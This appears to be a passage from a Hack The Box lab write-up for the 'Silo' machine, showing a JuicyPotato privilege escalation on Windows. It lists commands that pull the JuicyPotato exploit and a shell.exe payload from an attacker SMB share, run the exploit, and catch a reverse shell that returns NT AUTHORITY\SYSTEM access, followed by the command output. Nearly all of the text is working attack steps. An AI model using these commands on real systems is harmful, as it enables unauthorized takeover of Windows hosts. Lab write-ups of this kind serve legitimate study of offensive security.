JuicyPotato


juicypotato binaries can be found here

The current user has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set

Privilege Escalation


PS C:\tmp> copy \\10.10.14.5\smb\kernelbuster\JuicyPotato.exe
PS C:\tmp> copy \\10.10.14.5\smb\kernelbuster\shell.exe

I transferred the exploit and payload to the target system over SMB

PS C:\tmp> .\JuicyPotato.exe -t * -p C:\tmp\shell.exe -l 28313
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 28313
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

Launching the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/silo]
└─$ nnc 1234            
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.82] 49186
Windows PowerShell running as user SILO$ on SILO
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
SILO
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 10.10.10.82
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
 
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

System Level Compromise